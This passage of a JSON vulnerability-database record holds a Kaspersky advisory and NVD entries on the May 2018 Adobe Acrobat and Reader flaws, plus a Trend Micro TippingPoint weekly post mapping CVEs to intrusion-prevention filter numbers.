"CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "### *Detect date*:\n05/14/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in 
Adobe Acrobat and Acrobat Reader. Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information and bypass security restrictions. Below is a complete list of vulnerabilities:\n\n### *Affected products*:\nAdobe Acrobat DC earlier than 2018.011.20040 \nAdobe Acrobat Reader DC earlier than 2018.011.20040 \nAdobe Acrobat 2017 earlier than 2017.011.30080 \nAdobe Acrobat Reader 2017 earlier than 2017.011.30080 \nAdobe Acrobat DC (Classic 2015) earlier than 2015.006.30418 \nAdobe Acrobat Reader DC (Classic 2015) earlier than 2015.006.30418\n\n### *Solution*:\nUpgrade to latest version \n[Download Adobe Acrobat DC](<http://supportdownloads.adobe.com/product.jsp?product=1&platform=Windows>) \n[Download Adobe Acrobat Reader DC](<https://get.adobe.com/ru/reader/>)\n\n### *Original advisories*:\n[APSB18-09](<https://helpx.adobe.com/security/products/acrobat/apsb18-09.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Acrobat](<https://threats.kaspersky.com/en/product/Adobe-Acrobat/>)\n\n### *CVE-IDS*:\n[CVE-2018-4990](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4990>)0.0Unknown \n[CVE-2018-4947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4947>)0.0Unknown \n[CVE-2018-4948](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4948>)0.0Unknown \n[CVE-2018-4966](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4966>)0.0Unknown \n[CVE-2018-4968](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4968>)0.0Unknown \n[CVE-2018-4978](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4978>)0.0Unknown \n[CVE-2018-4982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4982>)0.0Unknown \n[CVE-2018-4984](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4984>)0.0Unknown \n[CVE-2018-4996](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4996>)0.0Unknown \n[CVE-2018-4952](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4952>)0.0Unknown 
\n[CVE-2018-4954](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4954>)0.0Unknown \n[CVE-2018-4958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4958>)0.0Unknown \n[CVE-2018-4959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4959>)0.0Unknown \n[CVE-2018-4961](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4961>)0.0Unknown \n[CVE-2018-4971](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4971>)0.0Unknown \n[CVE-2018-4974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4974>)0.0Unknown \n[CVE-2018-4977](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4977>)0.0Unknown \n[CVE-2018-4980](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4980>)0.0Unknown \n[CVE-2018-4983](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4983>)0.0Unknown \n[CVE-2018-4988](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4988>)0.0Unknown \n[CVE-2018-4989](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4989>)0.0Unknown \n[CVE-2018-4950](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4950>)0.0Unknown \n[CVE-2018-4979](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4979>)0.0Unknown \n[CVE-2018-4949](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4949>)0.0Unknown \n[CVE-2018-4951](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4951>)0.0Unknown \n[CVE-2018-4955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4955>)0.0Unknown \n[CVE-2018-4956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4956>)0.0Unknown \n[CVE-2018-4957](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4957>)0.0Unknown \n[CVE-2018-4960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4960>)0.0Unknown \n[CVE-2018-4962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4962>)0.0Unknown \n[CVE-2018-4963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4963>)0.0Unknown 
\n[CVE-2018-4964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4964>)0.0Unknown \n[CVE-2018-4967](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4967>)0.0Unknown \n[CVE-2018-4969](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4969>)0.0Unknown \n[CVE-2018-4970](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4970>)0.0Unknown \n[CVE-2018-4972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4972>)0.0Unknown \n[CVE-2018-4973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4973>)0.0Unknown \n[CVE-2018-4975](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4975>)0.0Unknown \n[CVE-2018-4976](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4976>)0.0Unknown \n[CVE-2018-4981](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4981>)0.0Unknown \n[CVE-2018-4986](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4986>)0.0Unknown \n[CVE-2018-4985](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4985>)0.0Unknown \n[CVE-2018-4953](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4953>)0.0Unknown \n[CVE-2018-4987](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4987>)0.0Unknown \n[CVE-2018-4965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4965>)0.0Unknown \n[CVE-2018-4993](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4993>)0.0Unknown \n[CVE-2018-4995](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4995>)0.0Unknown \n[CVE-2018-12812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12812>)0.0Unknown \n[CVE-2018-12815](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12815>)0.0Unknown\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. 
[More details](<https://threats.kaspersky.com/en/class/Exploit/>).", "edition": 40, "modified": "2020-06-18T00:00:00", "published": "2018-05-14T00:00:00", "id": "KLA11252", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11252", "title": "KLA11252 Multiple vulnerabilities in Adobe Acrobat and Acrobat Reader", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2018-05-21T19:18:28", "bulletinFamily": "blog", "cvelist": ["CVE-2018-1111", "CVE-2018-4944", "CVE-2018-4946", "CVE-2018-4947", "CVE-2018-4948", "CVE-2018-4949", "CVE-2018-4950", "CVE-2018-4951", "CVE-2018-4952", "CVE-2018-4953", "CVE-2018-4954", "CVE-2018-4955", "CVE-2018-4956", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4959", "CVE-2018-4960", "CVE-2018-4961", "CVE-2018-4962", "CVE-2018-4963", "CVE-2018-4964", "CVE-2018-4965", "CVE-2018-4966", "CVE-2018-4967", "CVE-2018-4968", "CVE-2018-4969", "CVE-2018-4970", "CVE-2018-4971", "CVE-2018-4972", "CVE-2018-4973", "CVE-2018-4974", "CVE-2018-4975", "CVE-2018-4976", "CVE-2018-4977", "CVE-2018-4978", "CVE-2018-4979", "CVE-2018-4980", "CVE-2018-4981", "CVE-2018-4982", "CVE-2018-4983", "CVE-2018-4984", "CVE-2018-4985", "CVE-2018-4986", "CVE-2018-4987", "CVE-2018-4988", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4993"], "description": "\n\nIt\u2019s one thing when your security solutions help protect your organization from a devastating cyberattack. It\u2019s another thing when the company who develops your security solutions takes it to the next level to actually help catch those responsible for some of the biggest cyberattacks in the world. 
Earlier this week, Trend Micro disclosed the details of its exclusive investigative cooperation with the Federal Bureau of Investigation (FBI) to identify, arrest and bring to trial the individuals linked to the infamous Counter Antivirus (CAV) service Scan4You.\n\nIn 2012, Trend Micro began its research on Scan4You, which allowed cybercriminals to check the detection of their latest malware against more than 30 modern antivirus engines, enabling them to make attacks more successful. After close collaboration with the FBI, Scan4You went offline following the arrest of two suspected administrators in May 2017. Ruslans Bondars was found guilty as a result of the recent trial, while Jurijs Martisevs pleaded guilty in March 2018.\n\nYou can read more about \u201cThe Rise and Fall of {Scan4You}\u201d [here](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-rise-and-fall-of-scan4you>).\n\n**Red Hat Fedora DHCP Client Network Manager Vulnerability**\n\nYesterday, Trend Micro released DVToolkit CSW file CVE-2018-1111.csw that contains the following filter:\n\n| \n\n * Filter C1000001: DHCP: Red Hat Fedora DHCP Client Network Manager Input Validation Vulnerability \n---|--- \n| \n \nThis command injection flaw found in a script included in the DHCP client (dhclient) packages affects Red Hat Enterprise Linux 6 and 7. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager, which is configured to obtain network configuration using the DHCP protocol.\n\nNote: This filter will be obsoleted by MainlineDV filter 31851 in next week\u2019s package.\n\n**Adobe Security Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Adobe updates released on or before May 8, 2018. The following table maps Digital Vaccine filters to the Adobe updates. 
You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [May 2018 Security Update Review](<https://www.zerodayinitiative.com/blog/2018/5/8/the-may-2018-security-update-review>) from the Zero Day Initiative:\n\n**Bulletin #** | **CVE #** | **Digital Vaccine Filter** | **Status** \n---|---|---|--- \nAPSB18-16 | CVE-2018-4944 | 31588 | \nAPSB18-09 | CVE-2018-4946 | 31687 | \nAPSB18-09 | CVE-2018-4947 | 31688 | \nAPSB18-09 | CVE-2018-4948 | 31589 | \nAPSB18-09 | CVE-2018-4949 | 31592 | \nAPSB18-09 | CVE-2018-4950 | 31593 | \nAPSB18-09 | CVE-2018-4951 | 31594 | \nAPSB18-09 | CVE-2018-4952 | 31695 | \nAPSB18-09 | CVE-2018-4953 | 31696 | \nAPSB18-09 | CVE-2018-4954 | 31697 | \nAPSB18-09 | CVE-2018-4955 | 31698 | \nAPSB18-09 | CVE-2018-4956 | N/A | Vendor Deemed Reproducibility or Exploitation Unlikely \nAPSB18-09 | CVE-2018-4957 | 31699 | \nAPSB18-09 | CVE-2018-4958 | 31700 | \nAPSB18-09 | CVE-2018-4959 | 31701 | \nAPSB18-09 | CVE-2018-4960 | 31702 | \nAPSB18-09 | CVE-2018-4961 | 31703 | \nAPSB18-09 | CVE-2018-4962 | 31704 | \nAPSB18-09 | CVE-2018-4963 | 31705 | \nAPSB18-09 | CVE-2018-4964 | 31706 | \nAPSB18-09 | CVE-2018-4965 | 31707 | \nAPSB18-09 | CVE-2018-4966 | 31708 | \nAPSB18-09 | CVE-2018-4967 | 31709 | \nAPSB18-09 | CVE-2018-4968 | 31710 | \nAPSB18-09 | CVE-2018-4969 | 31711 | \nAPSB18-09 | CVE-2018-4970 | 31712 | \nAPSB18-09 | CVE-2018-4971 | 31713 | \nAPSB18-09 | CVE-2018-4972 | 31714 | \nAPSB18-09 | CVE-2018-4973 | 31715 | \nAPSB18-09 | CVE-2018-4974 | 31716 | \nAPSB18-09 | CVE-2018-4975 | 31717 | \nAPSB18-09 | CVE-2018-4976 | 31718 | \nAPSB18-09 | CVE-2018-4977 | 31719 | \nAPSB18-09 | CVE-2018-4978 | 31720 | \nAPSB18-09 | CVE-2018-4979 | 31721 | \nAPSB18-09 | CVE-2018-4980 | 31722 | \nAPSB18-09 | CVE-2018-4981 | 31723 | \nAPSB18-09 | CVE-2018-4982 | 31724 | \nAPSB18-09 | CVE-2018-4983 | 31725 | \nAPSB18-09 | CVE-2018-4984 | 31726 | \nAPSB18-09 | CVE-2018-4985 | 31727 | \nAPSB18-09 | CVE-2018-4986 | 31597 | 
\nAPSB18-09 | CVE-2018-4987 | 31598 | \nAPSB18-09 | CVE-2018-4988 | 31596 | \nAPSB18-09 | CVE-2018-4989 | 31595 | \nAPSB18-09 | CVE-2018-4990 | 31591 | \nAPSB18-09 | CVE-2018-4993 | 31570 | \n \n\n**Zero-Day Filters**\n\nThere are 11 new zero-day filters covering four vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website. You can also follow the Zero Day Initiative on Twitter [@thezdi](<https://twitter.com/thezdi>) and on their [blog](<https://www.zerodayinitiative.com/blog>).\n\n**_Advantech (5)_**\n\n| \n\n * 31622: ZDI-CAN-5587: Zero Day Initiative Vulnerability (Advantech WebAccess HMI Designer)\n * 31624: ZDI-CAN-5590: Zero Day Initiative Vulnerability (Advantech WebAccess Node)\n * 31627: ZDI-CAN-5595: Zero Day Initiative Vulnerability (Advantech WebAccess Node)\n * 31628: ZDI-CAN-5596: Zero Day Initiative Vulnerability (Advantech WebAccess Node)\n * 31629: ZDI-CAN-5597: Zero Day Initiative Vulnerability (Advantech WebAccess Node) \n---|--- \n| \n \n**_Microsoft (2)_**\n\n| \n\n * 31620: ZDI-CAN-5567: Zero Day Initiative Vulnerability (Microsoft Visual Studio)\n * 31623: ZDI-CAN-5589: Zero Day Initiative Vulnerability (Microsoft Teams) \n---|--- \n| \n \n**_Omron (1)_**\n\n| \n\n * 30435: HTTP: Omron CX-One CX-FLnet Version Buffer Overflow Vulnerability (ZDI-18-289) \n---|--- \n| \n \n**_Trend Micro (3)_**\n\n| \n\n * 31619: ZDI-CAN-5553: Zero Day Initiative Vulnerability (Trend Micro Encryption for Email Gateway)\n * 31625: ZDI-CAN-5592: Zero Day Initiative Vulnerability (Trend Micro Encryption for Email Gateway)\n * 31626: ZDI-CAN-5594: Zero Day Initiative Vulnerability 
(Trend Micro Encryption for Email Gateway) \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<https://blog.trendmicro.com/tippingpoint-threat-intelligence-and-zero-day-coverage-week-of-may-7-2018/>).\n\nThe post [TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of May 14, 2018](<https://blog.trendmicro.com/tippingpoint-threat-intelligence-and-zero-day-coverage-week-of-may-14-2018/>) appeared first on [blog.trendmicro.com](<https://blog.trendmicro.com>).", "modified": "2018-05-18T14:52:12", "published": "2018-05-18T14:52:12", "id": "TRENDMICROBLOG:52B0618B9393F16E911AB8A5CC487A7C", "href": "https://blog.trendmicro.com/tippingpoint-threat-intelligence-and-zero-day-coverage-week-of-may-14-2018/", "type": "trendmicroblog", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of May 14, 2018", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2020-12-09T20:25:33", "description": "Adobe Acrobat and Reader 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier versions have a Type Confusion vulnerability. 
Successful exploitation could lead to arbitrary code execution in the context of the current user.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-20T19:29:00", "title": "CVE-2018-12812", "type": "cve", "cwe": ["CWE-704"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12812"], "modified": "2019-08-21T16:20:00", "cpe": ["cpe:/a:adobe:acrobat_reader_dc:18.011.20040", "cpe:/a:adobe:acrobat_reader_dc:15.006.30418", "cpe:/a:adobe:acrobat_dc:17.011.30080", "cpe:/a:adobe:acrobat_dc:15.006.30418", "cpe:/a:adobe:acrobat_dc:18.011.20040", "cpe:/a:adobe:acrobat_reader_dc:17.011.30080"], "id": "CVE-2018-12812", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12812", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_dc:15.006.30418:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30080:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30080:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:18.011.20040:*:*:*:continuous:*:*:*", 
"cpe:2.3:a:adobe:acrobat_reader_dc:15.006.30418:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:18.011.20040:*:*:*:continuous:*:*:*"]}, {"lastseen": "2020-12-09T20:25:44", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an Out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4970", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4970"], "modified": "2019-08-21T16:20:00", "cpe": [], "id": "CVE-2018-4970", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4970", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:44", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an Out-of-bounds read vulnerability. 
Successful exploitation could lead to information disclosure.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4981", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4981"], "modified": "2019-08-21T16:20:00", "cpe": [], "id": "CVE-2018-4981", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4981", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:44", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an Out-of-bounds read vulnerability. 
Successful exploitation could lead to information disclosure.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4972", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4972"], "modified": "2019-08-21T16:20:00", "cpe": ["cpe:/a:adobe:acrobat_reader_dc:17.011.30079", "cpe:/a:adobe:acrobat_reader_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:17.011.30079", "cpe:/a:adobe:acrobat_dc:15.006.30417", "cpe:/a:adobe:acrobat_reader_dc:15.006.30417"], "id": "CVE-2018-4972", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4972", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_reader_dc:15.006.30417:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:18.011.20038:*:*:*:continuous:*:*:*", 
"cpe:2.3:a:adobe:acrobat_dc:15.006.30417:*:*:*:classic:*:*:*"]}, {"lastseen": "2020-12-09T20:25:44", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an Out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4973", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4973"], "modified": "2019-08-21T16:20:00", "cpe": ["cpe:/a:adobe:acrobat_reader_dc:17.011.30079", "cpe:/a:adobe:acrobat_reader_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:17.011.30079", "cpe:/a:adobe:acrobat_dc:15.006.30417", "cpe:/a:adobe:acrobat_reader_dc:15.006.30417"], "id": "CVE-2018-4973", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4973", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_reader_dc:15.006.30417:*:*:*:classic:*:*:*", 
"cpe:2.3:a:adobe:acrobat_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:15.006.30417:*:*:*:classic:*:*:*"]}, {"lastseen": "2020-12-09T20:25:44", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an Out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4976", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4976"], "modified": "2019-08-21T16:20:00", "cpe": ["cpe:/a:adobe:acrobat_reader_dc:17.011.30079", "cpe:/a:adobe:acrobat_reader_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:17.011.30079", "cpe:/a:adobe:acrobat_dc:15.006.30417", "cpe:/a:adobe:acrobat_reader_dc:15.006.30417"], 
